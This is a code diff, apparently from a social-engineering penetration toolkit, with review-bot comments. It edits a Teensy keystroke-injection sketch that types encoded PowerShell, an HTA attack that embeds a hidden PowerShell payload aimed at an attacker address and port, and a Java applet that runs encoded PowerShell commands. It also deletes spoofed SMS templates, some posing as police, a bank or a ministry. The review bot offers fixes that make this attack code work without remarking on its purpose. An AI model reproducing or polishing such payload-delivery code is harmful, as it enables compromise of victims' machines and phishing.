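Review bot: The value substituted into `Keyboard.print("%s");` contains double quotes (setcore's `powershell_encodedcommand` wraps its `-C` argument in `"…"`), and it is interpolated unescaped into a C string literal, whereas the sketch text elsewhere in this commit escapes its embedded quotes as `\\"`; the generated teensy.ino should fail to compile as written. Escape before substituting, e.g. `""" % (core.powershell_encodedcommand().replace('"', '\\"'))`, and note that applying `%` to the whole sketch body means any other `%` in the template (the sibling sdcard2teensy sketch uses `%TEMP%`) would raise in the format — a `str.replace` on a unique placeholder avoids both problems. The same unescaped substitution applies to the `{encodedcommand}` placeholder in the sdcard2teensy hunk. The sketch body starts outside the hunk.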


@ -6,10 +6,6 @@ import subprocess
import src.core.setcore as core
# from src.core.setcore import *
# from src.core.dictionaries import *
# from src.core.menu.text import *
##########################################################################
#
# BSIDES LV SDCARD to Teensy Creator
@ -174,7 +170,7 @@ void setup()
// run through cmd
CommandAtRunBar("cmd");
delay(1000);
Keyboard.println("powershell -e {powershell_command}");
Keyboard.println("{encodedcommand} {powershell_command}");
// Tweak this delay. Larger files take longer to decode through powershell.
delay(10000);
Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %TEMP%\\\\{vbs}");
@ -232,7 +228,7 @@ Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
}}
""".format(random_filename=random_filename, powershell_command=powershell_command, vbs=vbs, bat=bat))
""".format(random_filename=random_filename, encodedcommand=core.powershell_encodedcommand() ,powershell_command=powershell_command, vbs=vbs, bat=bat))
# delete temporary file
subprocess.Popen("rm {0} 1> /dev/null 2>/dev/null".format(random_filename), shell=True).wait()
print("[*] Binary to Teensy file exported as teensy.ino")


@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="221251"
SUBJECT="Movistar: publicidad nieve"
BODY="MS Publi:Entra en www.apuntatealanieve.es y participa en el sorteo de 50 packs de 2 forfaits para 2 dias en cualquier estacion de Aramon. Valido hasta el 2/03"


@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="609"
SUBJECT="Movistar: publicidad verano internet"
BODY="Movistar publi: Este verano sigue en Internet con el Kit INTERNET MOVIL PREPAGO.Si lo usas pagas,si no lo usas no pagas.Consiguelo en tu distribuidor movistar"


@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="teabla"
SUBJECT="teabla: moviles gratis"
BODY="Rebajas exclusivas para ti en teabla: Llevate el Nokia 2680 por 13000 puntos y 0 euros.Solo hasta 15/02/10. Registrate en www.teabla.es 902203050"


@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="7412"
SUBJECT="TMB: temps espera"
BODY="0488-Av de Madrid-Vallespir Linia Temps *54 5 min* Temps aproximat. TMB Gràcies"


@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="221251"
SUBJECT="Movistar: publicidad ROCKRIO"
BODY="Movistar Publi:Vive ROCK&RIO al maximo con Movistar.Si eres de Telefonica o Movistar consigue tus entradas en movistar.es/rockinrio.SORTEAMOS 1.000. Hsta 19/04"


@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="2255"
SUBJECT="Movistar: publicidad tarifa llamada"
BODY="Movistar info: Recuerda q la Tarifa Diaria q ya disfrutas te permite llamar en Europa por slo 0,28e/min+0,57 (estb llam)+1,16e cada dia q la utilices.+inf 609"


@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="Movistar"
SUBJECT="Movistar: oferta otoño"
BODY="Publi:Hable en otoño 100 min y pague solo 1 hasta 9 nov cualquier destino nac(no incl establ)Alta 3,45e(iva incl)Y por 1,18 (iva incl)SMS al 50%.Alta en el 1200"


@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="474"
SUBJECT="Yavoy: regalo yavoy"
BODY="Publi:GRATIS tu primer Yavoy! Llama al 474, elige Yavoy preferido y nosotros te lo regalamos!D.Bisbal,Guetta,Baute,5a estacion...p.llam:0.15+0.30e/min"


@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="221252"
SUBJECT="Movistar: publicidad aramon"
BODY="movistar publi:Envia ARAMON al 7213 y consigue tu forfait ARAMONCLUB MOVISTAR con ventajas exclusivas y descuento hasta 20%.+info aramon.es"


@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="7770"
SUBJECT="Tu Banco: visa disponible en oficina"
BODY="TARGETA VISA JA DISPONIBLE A OFICINA DE RIERA BLANCA/TU BANCO.0000 LA RIERA BLANCA"


@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="M.vivienda"
SUBJECT="Ministerio vivienda: incidencia pago"
BODY="Ministerio de Vivienda. Tienes una incidencia en el pago de tu RBE. Motivo NO EXISTE VERIFICACION PAGO DEL ALQUILER info en www.alquilerjoven.es"


@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="609"
SUBJECT="Movistar: publicidad navidad"
BODY="Movistar Info:Cada año, las personas para las que eres importante te felicitan la Navidad.En movistar nos sumamos a ellas deseandote Feliz Navidad y Feliz 2010."


@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="86323663"
SUBJECT="Vodafone: publicidad nuevo contrato"
BODY="VF Info: El 1 de diciembre 2010 entra en vigor la nueva clausula 11 de las condiciones generales del contrato. Para informarte y oposicion consulta www.vodafone.es."


@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="609"
SUBJECT="Movistar: publicidad nokia gratis"
BODY="Movistar publi:por ser cliente Movistar tiene a 0 Euros un Nokia X6 con alta Tarifa Plana Internet movil Premium.Ms info en 609.Max 30.000 canjes hasta 31/3."


@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="2255"
SUBJECT="Movistar: publicidad tarifa sms"
BODY="Movistar publi: Con la Tarifa Diaria Europa los sms en Europa a 0,10e/sms y ahora las llamadas recibidas a 0e/min hasta el 12/4. ALTA Gratis llamando al 2255"


@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="5039"
SUBJECT="MRW: pedido no entregado"
BODY="MRW INFORMA: SU ENVIO 01111/1111100 NO HA PODIDO SER ENTREGADO POR AUSENCIA DEL DESTINATARIO. ROGAMOS CONTACTE CON SU FRANQUICIA MRW EN EL TLF. 933255454"


@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="762"
SUBJECT="ruralvia: confirmacion de transferencia"
BODY="El Sr/Sra DAVID FERNANDEZ VAZQUEZ le comunica que ha realizado una transferencia desde ruralvia a su favor por importe de 500,20 Euro"


@ -1,6 +0,0 @@
# Author: smsgang.com
#
#
ORIGIN="8888"
SUBJECT="Boss Fake"
BODY="Hi Michael, please come to office earlier tomorrow.\n\nI will wait you at 7 there"


@ -1,6 +0,0 @@
# Author: smsgang.com
#
#
ORIGIN="8888"
SUBJECT="Police Fake"
BODY="Dear Mr.Jackson, You are invited to nearest police station for questioning.\n\nPolice Department."


@ -1,6 +0,0 @@
# Author: smsgang.com
#
#
ORIGIN="8888"
SUBJECT="Vodafone Fool"
BODY="You have been charged 73 pounds for reading this SMS.\n\nThanks for using Vodafone."


@ -33,7 +33,7 @@ def gen_hta_cool_stuff():
"Generating powershell injection code and x86 downgrade attack...")
ps = generate_powershell_alphanumeric_payload(
selection, ipaddr, port, "x86")
command = ("powershell -window hidden -e " + ps)
command = (powershell_encodedcommand() + ps)
# hta code here
print_status("Embedding HTA attack vector and PowerShell injection...")
# grab cloned website
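Review bot: The new line `command = (powershell_encodedcommand() + ps)` relies on `powershell_encodedcommand` being a module-level name here, but the import is outside the hunk; if this file imports `setcore` with an explicit name list rather than `*`, the change is a `NameError` at runtime, so please confirm the import was updated alongside it. The parentheses are redundant: `command = powershell_encodedcommand() + ps`. The removed line spelled out the launcher options inline while the new one delegates all of them to the helper, so a one-line comment such as `# launcher flags now come from core.powershell_encodedcommand()` would tell the next reader where the command string is defined. `gen_hta_cool_stuff` starts outside the hunk.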


@ -245,7 +245,7 @@ public class Java extends Applet {
String[] arrSplit = strMain.split(",");
for (int i=0; i<arrSplit.length; i++)
{
f = Runtime.getRuntime().exec("cmd /c powershell -EncodedCommand " + arrSplit[i]);
f = Runtime.getRuntime().exec("cmd /c powershell -ec " + arrSplit[i]);
}
}
}
@ -259,7 +259,7 @@ public class Java extends Applet {
String[] arrSplit = strMain.split(",");
for (int i=0; i<arrSplit.length; i++)
{
f = Runtime.getRuntime().exec("cmd /c powershell -enc " + arrSplit[i]);
f = Runtime.getRuntime().exec("cmd /c powershell -ec " + arrSplit[i]);
}
}
}
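Review bot: The launcher literal `"cmd /c powershell -ec "` is now duplicated across the two `exec()` calls (this hunk and the one at `@ -245,7`), which is exactly how they drifted apart before (`-EncodedCommand` in one, `-enc` in the other); hoisting it into a single field, `private static final String PS_LAUNCHER = "cmd /c powershell -ec ";`, and writing `exec(PS_LAUNCHER + arrSplit[i])` in both loops keeps them in sync. Neither hunk documents the switch, and `-ec` only makes sense as PowerShell's unambiguous-prefix abbreviation of `-EncodedCommand`; a comment saying so next to the constant would stop a maintainer from "correcting" it back. The enclosing methods and the `Java` class start outside the hunk.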